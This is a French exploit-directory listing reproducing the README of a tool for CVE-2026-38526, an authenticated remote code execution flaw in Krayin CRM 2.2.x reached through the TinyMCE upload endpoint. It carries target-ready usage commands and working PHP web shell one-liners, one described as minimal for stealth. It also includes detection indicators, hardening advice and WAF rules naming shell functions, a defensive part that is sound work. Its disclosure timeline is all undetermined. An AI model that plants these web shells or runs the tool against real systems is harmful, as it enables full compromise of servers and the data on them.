Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — CVE-2026-38526 exploit pour Krayin CRM v2.2.x - RCE authentifié via contournement du téléchargement de fichiers TinyMCE. Caractéristiques : shell interactif, payloads multi-types, génération automatique de shell, et vérification. Auteur : Sudeepa Wanigarathna. Pour tests autorisés uniquement. | Kitploit
Outils/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingGénération de Shellcode
GitHubcerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

KrayinCRM-RCE-Exploit-CVE-2026-38526

Voir le dépôt
37il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

CVE-2026-38526 exploit pour Krayin CRM v2.2.x - RCE authentifié via contournement du téléchargement de fichiers TinyMCE. Caractéristiques : shell interactif, payloads multi-types, génération automatique de shell, et vérification. Auteur : Sudeepa Wanigarathna. Pour tests autorisés uniquement.

Partager

🔓 Krayin CRM v2.2.x - Exploit d'exécution de code à distance authentifiée

License: MIT CVE-2026-38526

⚠️ POUR TESTS DE SÉCURITÉ AUTORISÉS UNIQUEMENT - Toute utilisation non autorisée est illégale et contraire à l'éthique.

📋 Aperçu

Cet outil d'exploitation démontre une vulnérabilité critique d'exécution de code à distance (RCE) authentifiée découverte dans Krayin CRM version 2.2.x. La vulnérabilité réside dans la fonctionnalité de téléchargement de fichiers TinyMCE, qui permet aux administrateurs authentifiés de télécharger et d'exécuter du code PHP arbitraire sur le serveur.

PropriétéValeur
ID CVECVE-2026-38526
Logiciel concernéKrayin CRM v2.2.x
Type de vulnérabilitéExécution de code à distance authentifiée (RCE)
Authentification requiseOui (accès niveau Administrateur)
ImpactCompromission complète du système
Score CVSS8,8 (Élevé)

🚨 Détails de la vulnérabilité

La vulnérabilité provient d'une validation insuffisante du type de fichier dans le point de terminaison de téléchargement de fichiers TinyMCE (/admin/tinymce/upload). Un administrateur authentifié peut :

  • Télécharger un fichier PHP déguisé avec un type MIME d'image.
  • Le fichier est stocké dans un emplacement accessible via le web.
  • L'attaquant peut alors exécuter du code PHP arbitraire sur le serveur.

Versions concernées

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • Toutes les versions 2.2.x avant la publication du correctif

✨ Fonctionnalités

  • Types de shell multiples : Basique, Avancé, Minimal, Gestionnaire de fichiers et Personnalisé.
  • Shell interactif : Interface de type terminal complète avec historique des commandes.
  • Téléchargement de fichiers : Télécharger des fichiers supplémentaires via le shell.
  • Extraction de jeton CSRF : Gestion automatique de la protection CSRF.
  • Support proxy : Acheminer le trafic via des proxies HTTP/HTTPS.
  • Formats de sortie flexibles : Texte, JSON ou mode Silencieux.
  • Logique de nouvelle tentative : Nouvelle tentative automatique en cas d'échec de connexion.
  • En-têtes personnalisés : Prise en charge des en-têtes HTTP personnalisés.
  • Mode verbeux : Sortie de débogage détaillée.
  • Support SSL : Vérification facultative du certificat SSL.

📦 Installation

Prérequis

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

Installation rapide

root@kitploit:~
git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

Fichier des prérequis (requirements.txt)

root@kitploit:~
httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 Utilisation

Syntaxe de commande de base

root@kitploit:~
python3 exploit.py -t <URL_CIBLE> -u <NOM_UTILISATEUR> -p <MOT_DE_PASSE> [OPTIONS]

Paramètres requis

ParamètreDescription
-t, --targetURL cible (ex. http://192.168.1.100)
-u, --usernameNom d'utilisateur ou email administrateur
-p, --passwordMot de passe administrateur

Exemples d'utilisation courante

root@kitploit:~
# Exploitation de base avec shell généré
python3 exploit.py -t http://target.com -u [email protected] -p password

# Télécharger un fichier shell PHP personnalisé
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# Générer un shell avancé avec mode interactif
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# Générer un fichier shell sans exploitation
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# Utiliser un proxy pour les tests / le débogage
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# Sortie JSON pour l'automatisation
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# Mode verbeux avec délai d'attente personnalisé
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# User-Agent et en-têtes personnalisés
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 Types de shell

  1. Shell basique (basic) Exécution de commande simple avec la fonction system().

    root@kitploit:~
    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. Shell avancé (advanced) Shell riche en fonctionnalités avec :

    • Méthodes d'exécution de commandes multiples
    • Belle interface web de type terminal
    • Support de l'historique des commandes
    • Affichage de l'utilisateur actuel et du nom d'hôte
  3. Shell minimal (minimal) Empreinte minimale pour la discrétion.

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    
  4. Gestionnaire de fichiers (file_manager) Interface complète de gestion de fichiers :

    • Téléchargement de fichiers
    • Suppression de fichiers
    • Création de répertoires
    • Navigation
    • Visualisateur de permissions de fichiers
  5. Shell personnalisé (custom) Utilisez votre propre fichier shell PHP avec le paramètre -f.

📝 Formats de sortie

Format texte (par défaut)

Sortie colorée lisible par l'homme, adaptée à une utilisation interactive.

Format JSON (-o json)

Format lisible par machine pour l'automatisation et l'intégration.

root@kitploit:~
{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

Format silencieux (-q, --quiet)

Aucune sortie sauf pour les erreurs. Utile pour le traitement par lots.

⚙️ Options avancées

OptionDescriptionValeur par défaut
--timeoutDélai d'attente de la requête en secondes30
--retryNombre de tentatives de nouvelle tentative3
--retry-delayDélai entre les tentatives en secondes2
--user-agentChaîne User-Agent personnaliséeUA navigateur par défaut
--headerEn-têtes HTTP personnalisés (Clé : Valeur)Aucun
--verify-sslVérifier les certificats SSLFalse
--proxyURL du proxy HTTP/HTTPSAucun
-v, --verboseActiver la sortie de débogageFalse
-q, --quietSupprimer toute sortieFalse

Exemple d'en-têtes personnalisés

root@kitploit:~
--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 Détection et prévention

Signes de compromission (IoC)

  • Fichiers à surveiller :

    • Fichiers PHP inhabituels dans public/storage/upload/
    • Fichiers avec doubles extensions (ex. image.php.jpg)
    • Nouveaux fichiers avec des noms suspects
  • Journaux à vérifier :

    • Requêtes POST vers /admin/tinymce/upload
    • Horaires de connexion administrateur inhabituels
    • Tentatives d'authentification échouées
  • Indicateurs système :

    • Processus inattendus en cours d'exécution
    • Nouvelles tâches cron
    • Fichiers système modifiés

Mesures de prévention

  • Actions immédiates :

    root@kitploit:~
    # Mettre à jour vers la version corrigée
    composer update krayin/crm
    
    # Désactiver temporairement l'accès administrateur
    # Supprimer les comptes administrateur inutiles
    # Changer tous les mots de passe administrateur
    
  • Durcissement du téléchargement de fichiers :

    root@kitploit:~
    // Valider le type de fichier par le contenu, pas seulement par l'extension
    // Implémenter une politique de sécurité du contenu
    // Utiliser un pare-feu applicatif Web (WAF)
    // Activer l'analyse du téléchargement de fichiers
    
  • Contrôle d'accès :

    root@kitploit:~
    # Restreindre les IP administrateur dans .htaccess
    # Implémenter l'authentification multifacteur pour les comptes administrateur
    # Audit régulier des administrateurs
    # Politiques de délai d'expiration de session
    
  • Règles WAF (ModSecurity) :

    root@kitploit:~
    # Bloquer les téléchargements de fichiers suspects
    SecRule FILES "\.(php|phtml|php[0-9])" "id:1001,deny,status:403,msg:'PHP file upload blocked'"
    
    # Bloquer les shells web
    SecRule ARGS "system|exec|shell_exec|passthru" "id:1002,deny,status:403,msg:'Shell command blocked'"
    

🛡️ Divulgation responsable

Cette vulnérabilité a été découverte dans le cadre d'une recherche en sécurité responsable. Le processus de divulgation a suivi les étapes suivantes :

  • Découverte : Vulnérabilité identifiée lors d'une évaluation de sécurité.
  • Vérification : Confirmation de la vulnérabilité dans Krayin CRM 2.2.x.
  • Signalement : Notification privée aux développeurs de Krayin CRM.
  • Coordination : Travail avec l'équipe pour développer un correctif.
  • Correctif : En attente de la publication officielle du correctif.
  • Divulgation : Divulgation publique après disponibilité du correctif.

Calendrier

  • Découverte : À déterminer
  • Signalement : À déterminer
  • Correctif publié : À déterminer
  • Divulgation publique : À déterminer

📜 Avertissement

root@kitploit:~
CE LOGICIEL EST FOURNI "EN L'ÉTAT" ET TOUTE GARANTIE EXPRESSE OU IMPLICITE, 
Y COMPRIS, MAIS SANS S'Y LIMITER, LES GARANTIES IMPLICITES DE QUALITÉ MARCHANDE 
ET D'ADÉQUATION À UN USAGE PARTICULIER SONT DÉCLINÉES. EN AUCUN CAS 
L'AUTEUR NE POURRAIT ÊTRE TENU RESPONSABLE DE TOUT DOMMAGE DIRECT, INDIRECT, 
ACCESSOIRE, SPÉCIAL, EXEMPLAIRE OU CONSÉCUTIF DÉCOULANT DE L'UTILISATION 
DE CE LOGICIEL.

L'UTILISATION DE CET OUTIL À D'AUTRES FINS QUE DES TESTS DE SÉCURITÉ AUTORISÉS 
EST ILLÉGALE ET CONTRAIRE À L'ÉTHIQUE. L'AUTEUR N'ASSUME AUCUNE RESPONSABILITÉ 
EN CAS D'UTILISATION NON AUTORISÉE OU DE DOMMAGES CAUSÉS PAR CET OUTIL.

🔧 Dépannage

Problèmes courants

  • Problème : L'authentification échoue

    • Solution : Vérifiez les identifiants, assurez-vous que le chemin de connexion administrateur est /admin/login
    • Vérification : Assurez-vous que l'extraction du jeton CSRF fonctionne correctement
  • Problème : Le téléchargement de fichier échoue

    • Solution : Vérifiez les permissions des fichiers, vérifiez que le point de terminaison de téléchargement existe
    • Vérification : Assurez-vous que la cible utilise l'éditeur TinyMCE
  • Problème : Le shell n'exécute pas les commandes

    • Solution : Vérifiez que les fonctions PHP ne sont pas désactivées dans php.ini
    • Vérification : Testez avec une commande simple comme echo test
  • Problème : Erreurs de certificat SSL

    • Solution : Utilisez l'option --verify-ssl ou désactivez la vérification
    • Remarque : Les certificats auto-signés généreront des erreurs sans vérification appropriée

Mode débogage

root@kitploit:~
# Activer la journalisation verbeuse
python3 exploit.py -t http://target.com -u admin -p pass -v

# Avec proxy (Burp Suite, etc.)
python3 exploit.py -t http://target.com -u admin -p pass --proxy http://127.0.0.1:8080

🤝 Contribution

Les contributions sont les bienvenues ! Veuillez vous assurer de :

  • Tester correctement tout le code.
  • Mettre à jour la documentation.
  • Suivre les directives éthiques.
  • Mener les recherches de vulnérabilités de manière responsable.

📚 Références

  • Site officiel de Krayin CRM
  • CVE-2026-38526
  • OWASP Exécution de code à distance
  • Bonnes pratiques de sécurité PHP

⭐ Soutien

Si vous trouvez cet outil utile pour la recherche en sécurité, veuillez considérer :

  • ⭐ Mettre une étoile au dépôt
  • 🔔 Suivre pour les mises à jour
  • 📢 Partager avec d'autres chercheurs en sécurité

Créé avec ❤️ pour la recherche en sécurité

Souvenez-vous : Un grand pouvoir implique de grandes responsabilités. Utilisez ces connaissances avec sagesse !

📊 Fiche de référence rapide des commandes

root@kitploit:~
# Référence rapide
python3 exploit.py -t URL -u UTILISATEUR -p MOT_DE_PASSE [OPTIONS]

# Options :
#   -f FICHIER           Télécharger un shell personnalisé
#   --shell-type TYPE    Basic|Advanced|Minimal|File_Manager|Custom
#   -i                   Mode interactif
#   --proxy URL          Proxy HTTP
#   -v                   Sortie verbeuse
#   -o json              Sortie JSON
#   --generate-only      Créer un shell sans exploiter
#   --timeout SEC        Délai d'attente de la requête
#   --retry N            Nombre de tentatives
#   --user-agent UA      User-Agent personnalisé
#   --header "K: V"      En-têtes personnalisés
#   --verify-ssl         Vérifier les certificats SSL
#   -q, --quiet          Supprimer la sortie

🔒 N'oubliez pas : Obtenez toujours une autorisation écrite avant de tester un système !

Télécharger l’outil